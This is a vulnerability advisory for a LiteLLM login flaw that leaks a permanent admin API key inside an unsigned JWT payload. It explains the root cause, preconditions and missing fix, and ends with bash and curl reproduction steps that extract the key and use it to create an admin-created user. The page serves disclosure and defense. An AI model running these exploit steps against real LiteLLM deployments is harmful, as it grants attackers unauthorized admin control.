BerriAI litellm PROXY_ADMIN database API Key Generator login_utils.py authenticate_user session expiration
Description
A security flaw has been discovered in BerriAI litellm up to 1.82.2. This impacts the function authenticate_user of the file litellm/proxy/auth/login_utils.py of the component PROXY_ADMIN database API Key Generator. Performing a manipulation results in session expiration. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1Patches
Vulnerability mechanics
Root cause
"The `generate_key_helper_fn()` call was not removed from the login flow during the JWT migration, causing every `/login` request to create a permanent PROXY_ADMIN database API key that is leaked inside the JWT payload and never expired."
Attack vector
An attacker who can intercept a login JWT cookie (e.g., through XSS, network sniffing, or log exposure) can decode the JWT without any secret because the payload is only base64-encoded. The extracted `sk-...` key is a standalone PROXY_ADMIN bearer token that remains valid for 12 hours independent of the JWT session. Because each login creates a new key without expiring previous ones, an attacker can accumulate multiple valid admin tokens and use them to perform any admin action, such as creating new users [ref_id=1].
Affected code
The flaw resides in `litellm/proxy/auth/login_utils.py` within the `authenticate_user()` function. Both the admin login path (line 177) and the user login path (line 265) call `generate_key_helper_fn()` to create a permanent PROXY_ADMIN database API key on every login. The resulting key is then embedded in the JWT cookie payload at line 332-334 via `key=login_result.key`. The same pattern exists in the `/onboarding/get_token` endpoint in `proxy_server.py` (line 11159).
What the fix does
The advisory does not include a published patch. The recommended fix is to remove the `generate_key_helper_fn()` call from the login flow so that no permanent database API key is created during authentication, and to restore the `expire_previous_ui_session_tokens` function that was removed during the JWT migration. Without these changes, every login continues to leak a permanent admin key inside the JWT and never expires prior keys [ref_id=1].
Preconditions
- configThe target must be a LiteLLM deployment with a PostgreSQL database (DATABASE_URL set).
- networkThe attacker must be able to intercept a login JWT cookie (e.g., via XSS, network sniffing, or log exposure).
- authNo authentication is required beyond obtaining the JWT cookie from a legitimate login.
Reproduction
1. Login and capture the JWT cookie: ```bash TOKEN=$(curl -s -D - -X POST http://localhost:4000/login \ -d "username=admin&password=sk-1234" \ -o /dev/null 2>&1 | grep -oP 'token=\K[^;]+') ``` 2. Decode the JWT and extract the embedded DB key: ```bash DB_KEY=$(echo "$TOKEN" | cut -d. -f2 | base64 -d 2>/dev/null | \ python3 -c "import sys,json; print(json.load(sys.stdin)['key'])") echo "Extracted admin DB key: $DB_KEY" ``` 3. Use the extracted key as a standalone admin API key: ```bash curl -X POST http://localhost:4000/user/new \ -H "Authorization: Bearer $DB_KEY" \ -H "Content-Type: application/json" \ -d '{"user_email": "attacker@evil.com"}' ``` Returns HTTP 200 — full admin access. [ref_id=1]
Generated on Jun 21, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- gist.github.com/YLChen-007/39ed709ce322431658a05b951e91f278mitreexploit
- vuldb.com/cve/CVE-2026-12772mitrethird-party-advisory
- vuldb.com/submit/811281mitrethird-party-advisory
- vuldb.com/vuln/372514mitrevdb-entrytechnical-description
- vuldb.com/vuln/372514/ctimitresignaturepermissions-required
News mentions
0No linked articles in our index yet.